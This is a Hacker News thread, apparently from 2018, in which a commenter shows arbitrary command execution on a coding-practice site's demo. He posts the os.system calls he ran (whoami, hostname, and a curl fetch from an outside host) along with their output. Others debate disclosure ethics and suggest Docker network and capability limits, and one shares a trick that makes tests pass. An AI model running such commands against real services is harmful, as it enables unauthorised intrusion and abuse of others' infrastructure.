8 ms·
Good job. However, I was able to run the following on your machine (on the publicly available demo page): def hello(): import os print(os.system("whoam
by xtrapolate 8y ago
Good job. However, I was able to run the following on your machine (on the publicly available demo page):
def hello():
import os
print(os.system("whoami"))
print(os.system("hostname"))
print(os.system("curl http://redacted/ http://redacted/ > ./owned.txt"))
print(os.system("curl -s http://whatismyip.akamai.com/") http://whatismyip.akamai.com/"))
print(os.system("cat ./owned.txt"))
print(os.system("ping -c 1 8.8.8.8"))
Results:
codewarrior
5a8eb7db8f0e
162.243.103.238
PING 8.8.8.8 (8.8.8.8) 56(84) bytes of data.
64 bytes from 8.8.8.8: icmp_seq=1 ttl=123 time=0.668 ms
--- 8.8.8.8 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.668/0.668/0.668/0.000 ms
162.243.103.238 is a DigitalOcean address. My server's log indicates the curl command actually pulled the file. Please secure your services or they will be abused by wrong doers. In all honesty, I would advise to take the entire service down until this is fully mitigated.
- procinct 8y agoI can’t help but feel that posting this in a HN comment when they’re showing off the site isn’t exactly responsible disclosure.
- dna_polymerase 8y agoWhoever runs a service that allows running untrusted code in 2018 deserves no responsible disclosure but a punch in the face. It doesn't help if we allow those entities to exist.
- procinct 8y agoChances are, they are a beginner. This is someone’s side project not a site backed by a huge corporation. They deserve responsible disclosure so they can learn from it.
- moftz 8y agoIts just a fork of codewars Try typing this before every function (python): class Test: def assert_equals(*args): return True
- SlowRobotAhead 8y agoOn the flip side, if such an embarrassing exploit is found in the first hour, maybe it’s the equivalent to making the student read their note out to the entire class as punishment?
- dang 8y agoPlease don't be a jerk on HN. Edit: it looks like you've done it repeatedly; https://news.ycombinator.com/item?id=18381061 https://news.ycombinator.com/item?id=18381061 was actually a bannable offense. Commenters here need to do better than this, so please view https://news.ycombinator.com/newsguidelines.html https://news.ycombinator.com/newsguidelines.html and follow the rules from now on.
- hartator 8y agoResponsible disclosure is meant when it can jeopardize user data or user devices. It’s reasonable to assume none of that apply for a brand new service. Specially now everyone is learning from it.
- dqpb 8y agoI disagree. I see HN as a community of people involved in similar pursuits, and demonstrating issues like this publicly is educational for everyone.
- DavideNL 8y agoSure, but you can "demonstrate" the details after it's fixed.
- SlowRobotAhead 8y agoSeems like a lot of damage could have been obviously omitted by just removing anything os.system(), which for the purpose (not effect here) of Duolingo style education should have been just fine. I get your point and the other guy’s too. I line up on the side that disclosures should be messy and embarrassing sometimes, as incentive to really think about what you are doing. The danger here is low.
- rjplatte 8y agoHe needs to be running a client-side service, not running whatever someone enters on his machine
- xtrapolate 8y ago> "He needs to be running a client-side service, not running whatever someone enters on his machine" I would say that for the most part, websites such as this don't actually need a real, full-blown %s-lang compiler/VM that actually executes real code on a backend server. It would be enough to tokenize and parse things on the client's side and validate ABNF via JS. This would reduce the costs involved with running such a website, and the attack surface. If you want to get fancy, you could host an in-browser Python VM - but that's an overkill for a website such as this. Also, they're trying to support a fair bit of languages here, not all of which have browser-targeted tooling that could compile and run the code.
- wild_preference 8y agoThen you end up with a system where someone can arrive at the right answer via AST that you didn't expect, which was a frustration when I helped students with a service like (IIRC) CodeCademy.
- cellularmitosis 8y agoParsing the AST is something I would love to apply to a site like 4clojure.com, to get a histogram of the "shape" of all of the submitted solutions.
- hathawsh 8y agoI wonder if WebAssembly could help accomplish that. Still, even Rust has a compile-and-execute web service call accessible from the rust-lang home page. If Rust people (who tend to emphasize security) feel it is possible to secure that web service, then I'm inclined to believe them. It may be difficult though.
- 8y ago
- i_am_nomad 8y agoAnd this also illustrates why Apple forbids any kind of iOS app that lets a user write and execute code.
- gugagore 8y agoMaybe I don't see your point, but an iOS app could execute code locally. The only risk is the device owner could compromise the device. There is no [additional] risk of another user doing so.
- wild_preference 8y agoThe browser's Javascript console also only runs code locally, but getting people to copy code into it is a serious attack vector. Not saying that's Apple's reason, but being limited to local execution doesn't mean it's safe.
- krferriter 8y agoBecause javascript run locally can connect to the internet, and if it put into the console within the page on a domain that is storing secrets in local storage/cookies, it can scoop up all your credentials or other private information and send them to some other server. Unrestricted local execution can give up full access to local user's accounts, so is not good. Server execution can do that and also maybe impact other users.
- zapzupnz 8y agoExcept that hasn't been true for years in certain circumstances, particularly where the value of an app running user-created code is educational in nature. See Pythonista, Codea, Swift Playgrounds, or hell, Shortcuts.
- saagarjha 8y agoShortcuts, and Swift Playgrounds even more so, have been granted private entitlements by Apple to function.
- kuroop 8y agoI think a responsible thing should be to take down the site, so that other users data don't get hacked by misuse by some malicious entity.
- b3y0nd1337 8y agoHackerman spotted.
- anonymousJim12 8y agoIt's obviously running in a container. I'm not sure your code really shows anything too concerning if they are taking precautions outside of the container to mitigate things like DDoS etc.
- xtrapolate 8y agoGetting an exorbitant bill from DigitalOcean after someone has abused your "containers" would not concern you then?
- anonymousJim12 8y agoI'm just not sure what you are alleging? Just because you have full "shell" access to the container doesn't necessarily imply any thing needs to be mitigated. What specifically are your concerns? What about what you've learned will create an exorbitant bill?
- simias 8y agoYou're right but the fact that he was able to curl a file from the outside does seem pretty bad. It means that you can effectively proxy traffic through the website and use it to target 3rd parties.
- xtrapolate 8y ago> "What specifically are your concerns? What about what you've learned will create an exorbitant bill?" Abusing the containers to send large amounts of outgoing traffic would do just that. Downloading files would do that too. How about sending a "while(true) { }" to hog some CPU? It doesn't take much to cause significant monetary damage. Depending on their set-up, those containers could contain credentials or some other means to compromise the rest of the website. Perhaps it is possible to re-use the containers across different "sessions", serving multiple clients with malicious traffic. Those are plausible scenarios. I'm not carrying out a full PT right now. Demonstrating the platform has been compromised is more than enough. Any other questions?
- asadlionpk 8y agoIf this is running inside docker, please consider putting limits or disabling network to the container completely. Using --net=none option.
- WestCoastJustin 8y agoFor anyone else who runs into this. You can restricted a set of capabilities each container can use. This, for example can deny mount operations, socket access, etc. You can do this via "docker run" --cap-add or --cap-drop [2]. This type of stuff is great for running docker-in-docker for these types of learning tools or Jenkins builds. You'll need to play around with it though to make sure it'll work for you. For a real-world example check out http://play-with-docker.com http://play-with-docker.com as they are running docker-in-docker and all the backend code is at https://github.com/play-with-docker/play-with-docker https://github.com/play-with-docker/play-with-docker. So, you can likely get ideas from what they are doing to lock down their env. [1] https://docs.docker.com/engine/security/security/#linux-kernel-capabilities https://docs.docker.com/engine/security/security/#linux-kern... [2] https://docs.docker.com/engine/reference/run/#runtime-privilege-and-linux-capabilities https://docs.docker.com/engine/reference/run/#runtime-privil...
- leifmetcalf 8y agoHow does the url http://redacted/ http://redacted/ work? I've never seen a url without a tld on the end. Could I register the domain http://foo http://foo ?
- mehrdadn 8y agoThey meant they redacted the URL, not that the URL was literally "http://redacted" http://redacted".
- xtrapolate 8y ago> "How does the url http://redacted/ http://redacted/ work?" I apologize for the confusion. I used an actual server there (ie. http://somename.com http://somename.com) but chose to redact the actual URL from this post.
- leifmetcalf 8y agoAh, that explains it. The link actually works, though.
- dc_gregory 8y agoNot for me! Might want to ask your ISP whats going on?
- pseudoanonymity 8y agoBrowser may autocomplete .com when given address starting with http:// http://
- bmn__ 8y agohttps://en.wikipedia.org/wiki/Example_domain https://en.wikipedia.org/wiki/Example_domain
- snek 8y agoin this case, `redacted` itself is the tld. the company that owns `.redacted` (Redacted, Inc) has chosen to serve A records for it, which is rather uncommon. For a while, the owners of `.ai` had a similar arrangement, but it seems to have been since taken down.
- rhexs 8y agoTo others thinking about doing this: keep in mind this is against the law in the United States. Even if it's for a "good cause", you can't just "pen-test" (hack) anyone you want. Granted, I really doubt anyone would prosecute over something like this, but a bigger company? Absolutely possible.
- Method-X 8y agoAll code is executed in a docker container and destroyed after runtime completes (or times out). It's also contained on a remote server completely unrelated to the functioning of the web app itself. Over the past year and a half I've hired two developers familiar with how docker works to find security exploits. None could find any. Can you still access the file you created?